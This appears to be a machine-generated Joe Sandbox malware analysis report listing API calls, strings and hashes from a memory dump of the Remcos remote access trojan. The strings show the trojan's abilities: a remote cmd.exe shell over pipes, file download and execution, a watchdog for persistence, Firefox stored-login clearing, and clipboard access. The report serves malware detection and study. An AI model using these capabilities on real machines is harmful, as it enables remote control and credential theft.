                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2948481953-0
                                                                                                                                                                                                  • Opcode ID: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                                                                                                                                                                  • Instruction ID: c73268819cb60d4ae5e82c4b87b0b0ed6d20300d6cd2269ac6e8254bb02e1260
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FD05E76C4120CFFCB006BA4AC0E8AEB77CFB09211B50116AEC2442252AA369D188A64
                                                                                                                                                                                                  Function 10005C45 Relevance: 1.6, APIs: 1, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __crt_fast_encode_pointer
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3768137683-0
                                                                                                                                                                                                  • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                                                                                  • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                                                                                                                                                                  Function 004118ED Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                                                                                                                                  • Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
                                                                                                                                                                                                  Function 0043AA9B Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __alldvrm
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 65215352-0
                                                                                                                                                                                                  • Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                                                                                                                                  • Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
                                                                                                                                                                                                  Function 004461B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                  • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                                                                                                                  • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                                                                                                                                                  Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Startup
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 724789610-0
                                                                                                                                                                                                  • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                                                                                                                                  • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                                                                                                                                                                  Function 004027A7 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Deallocatestd::_
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1323251999-0
                                                                                                                                                                                                  • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                                                                                  • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                                                                                                                                                  Function 00426D42 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: recv
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1507349165-0
                                                                                                                                                                                                  • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                                                                                                                                  • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                                                                                                                                                                  Function 00426D59 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: send
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2809346765-0
                                                                                                                                                                                                  • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                                                                                                                                  • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                                                                                                                                                                                  Function 00411CDE Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                  • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                                                                                                                                  • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06

                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                  Function 00407CD2 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                                                                                                                                                    • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                                                                                                                                    • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                                                                                                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                                                                                                                                    • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                                                                                                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                                                                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                                                                                                                                                  • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                                                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                                                                                                                                                    • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                                                                                                                                                    • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                                                                                                                    • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                                                                                                                    • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                                                                                                                  • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                                                                                                                                                  • StrToIntA.SHLWAPI(00000000), ref: 00408775
                                                                                                                                                                                                    • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                                                                                                                  • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                                                                                                                                                  • API String ID: 1067849700-181434739
                                                                                                                                                                                                  • Opcode ID: 3817d59f13ca8fe8e185b4014e92b89e3ece5399662c1fa5bb97dafb16bc065d
                                                                                                                                                                                                  • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3817d59f13ca8fe8e185b4014e92b89e3ece5399662c1fa5bb97dafb16bc065d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                                                                                                                                                                  Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                                                                                                                                  • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                                                                                                                                                                  • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                                                                                                                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                                                                                                                                  • PeekNamedPipe.KERNEL32 ref: 004058BC
                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                                                                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                                                                                                                                                                  • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 00405A23
                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 00405A45
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                                                                                  • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                                                                                                                                                  • API String ID: 2994406822-18413064
                                                                                                                                                                                                  • Opcode ID: d16286c7c38df6e2a78898b44b0a418d7ee8de31fdaa2db65b94654e283f2e3b
                                                                                                                                                                                                  • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d16286c7c38df6e2a78898b44b0a418d7ee8de31fdaa2db65b94654e283f2e3b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                                                                                                                                                                  Function 00412132 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                                                                                                                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                                                                                    • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                                                                                                                    • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                                                                                                                                                                  • OpenMutexA.KERNEL32 ref: 00412181
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                                                                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                                                                                                                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                                                                                                                                  • API String ID: 3018269243-13974260
                                                                                                                                                                                                  • Opcode ID: 2205b3d103f08f6d55fa3a4c0d872f48598f397e46eb09d3558a5a12db7084c4
                                                                                                                                                                                                  • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2205b3d103f08f6d55fa3a4c0d872f48598f397e46eb09d3558a5a12db7084c4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                                                                                                                                                                  Function 0040BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                                                                                  • API String ID: 1164774033-3681987949
                                                                                                                                                                                                  • Opcode ID: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                                                                                                                                  • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                                                                                                                                                  Function 004168FC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenClipboard.USER32 ref: 004168FD
                                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 0041690B
                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00416990
                                                                                                                                                                                                  • OpenClipboard.USER32 ref: 00416997
                                                                                                                                                                                                  • GetClipboardData.USER32 ref: 004169A7
